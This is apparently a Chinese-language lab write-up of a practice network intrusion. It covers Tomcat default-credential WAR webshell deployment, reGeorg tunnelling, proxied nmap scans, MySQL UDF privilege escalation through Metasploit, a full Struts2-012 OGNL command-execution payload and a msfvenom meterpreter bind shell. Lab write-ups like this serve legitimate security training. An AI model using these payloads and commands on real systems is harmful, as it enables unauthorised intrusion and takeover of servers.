靶场攻略 | 记一次实验靶场练习笔记
2023-3-28 15:30:9 Author: www.secpulse.com(查看原文) 阅读量:25 收藏

前两天朋友分享了一个实验靶场,感觉环境还不错,于是对测试过程进行了详细记录,靶场中涉及知识点总结如下:

  • War包制作

  • regeorg内网代理工具的使用

  • UDF漏洞利用

  • Struts2-012漏洞利用

  • Msfvenom模块的使用

本次实验靶场的网络拓扑结构如下图所示:

获取web据点

首先访问朋友给定的web服务器端口,为tomcat应用的默认页面,如下图所示:

如果刚开始没有思路的话,可以百度搜索一下Tomcat示例页面相关漏洞情况。访问目标manager后台目录,尝试tomcat默认口令tomcat/tomcat进行登录:

登录成功之后,tomcat管理后台有个部署war包的功能,可以通过上传war包getshell,获取服务器权限。

在攻击机kali中生成war包后门,可以用自己的木马,也可使用kali自带webshell,默认路径:/usr/share/laudanum/
jar cvf shell.war xx.jsp

在WAR file to deploy 功能处上传并部署后门war包,单击选择文件,选择生成的war文件并确定,点击击deploy按钮就完成了上传。
验证是否上传成功,浏览器访问注意事项:根目录+war包文件名+jsp webshell文件名
比如我上传了的war包名为cmd.war,木马名为:cmd.jsp
在浏览器地址栏中:hxxp://x.x.x.x/cmd/cmd.jsp     

接下是连接上传的jsp一句话,使用C刀连接目标服务器的jsp木马
下载地址:https://github.com/Chora10/Cknife  可自行编译或者下载网上的程序虚拟机里执行。

菜刀成功连接后,会以树状形式显示webshell文件所处位置,如下图所示

添加代理

拿下web边界机以后,一般情况下,分两种情况:
  • 有内网:以此为跳板,攻击内网其他机器,摸清目标内网拓扑环境,拿下靶标系统;

  • 无内网:如果是项目,就可以收工了,不是的话,就可以作为代理池的一部分;

下面的情况属于有内网的环境,查看本机IP地址,发现两个网卡都有内网地址。

目标web服务器并无探测主机存活的工具,两种方式:

  • 自己上传端口扫描工具||脚本

  • 使用隧道代理工具,代理自己的工具进入目标内网中,做初步的信息搜集。

此处选择第二种方式,上传regeorg程序的tunnel.jsp脚本到目标服务器的shell目录下

web访问返回连接成功的信息(Georg says,’All seems fine’)   如下图所示,此为该工具流量硬特征,建议在下载后修改该字符串,或者使用升级版的neo-regeorg

https://github.com/L-codes/Neo-reGeorg      去特征且传输加密

使用regeorg工具建立隧道,命令如下:
Python regeorgsocksproxy.py -u   hxxp://x.x.x.x/tunnel.jsp -p xxxx

-u 代理木马链接;

-p指定传输端口;

在proxychains工具配置文件下添加regeorg打通的代理端口
vim /etc/proxychains.conf        在最后一行添加regeorg的配置好的传输端口即可

代理nmap到内网扫描172网段敏感端口,使用TCP全连接扫描
一些Nmap使用语法:http://mang0.me/archis/40a439a4/

UDF漏洞利用

通过扫描得到的MySQL应用信息,尝试弱口令连接,一样的思路哪个应用不会搜索哪里

查看security_file_priv是否配置命令:

show variables like '%secure%';

显示结果对应解释

Secure_file_priv=null               //不允许导入导出文件
Secure_file_priv='D:/'  //允许导入到指定目录
Secure_file_priv=‘’               //允许到任意目录
Secure_file_priv=”/”              //允许到根目录

发现为空可以写任意目录,使用proxychains将msf代理到目标内网中,利用MySQL的UDF漏洞进行命令执行。

如果忘记模块,可以先search 需要的模块内容关键字
Use exploit/multi/mysql/mysql_udf_payload
查看未设置的参数   show  options
Password和rhost参数可以设置   

Set rhost 172.16.15.16
Set password 123456  
run

虽然显示没有会话,但是so文件已经传上去了,使用默认的MySQL命令连接,执行自定义函数,成功执行,说明udf提权成功。

S2-012漏洞利用

代理nmap到内网扫描10网段机器敏感端口

发现10.10.60.250:8080存在struts2-012漏洞

Struts2-012 payload 测试

%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-al"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

成功读取/etc/passwd文件

10.10.60.66和172.16.15.16一样的思路。

弱口令:admin/password

上传菜刀的jsp木马

使用蚁剑服务器管理工具连接成功

Msf生成Linux木马

msfvenom -p linux/x86/meterpreter/bind_tcp rhost=10.10.60.66 lport=1234 -f elf > shell.elf

生成完成后将该木马程序上传到目标服务器的web目录下,赋予权限,在msf中开启监听模块,执行程序,即可拿到会话
设置msf下handler模块必要的参数
set payload linux/x86/meterpreter/bing_tcp
Set rhost 10.10.60.66
Set lport 1234

exploit -j        后台获取会话
Sessions          可查看会话  
-i                进入该会话

本次实验到此结束,通过弱口令并结合应用特性拿到主机权限,使用内网代理工具建立隧道,探测内网段端口及对应漏洞,拿下对应主机权限。
最后如果觉得对自己有帮忙的,可以点个在看,关注一手,谢谢师傅们阅读。

本文作者:贝塔安全实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/198336.html


文章来源: https://www.secpulse.com/archives/198336.html
如有侵权请联系:admin#unsafe.sh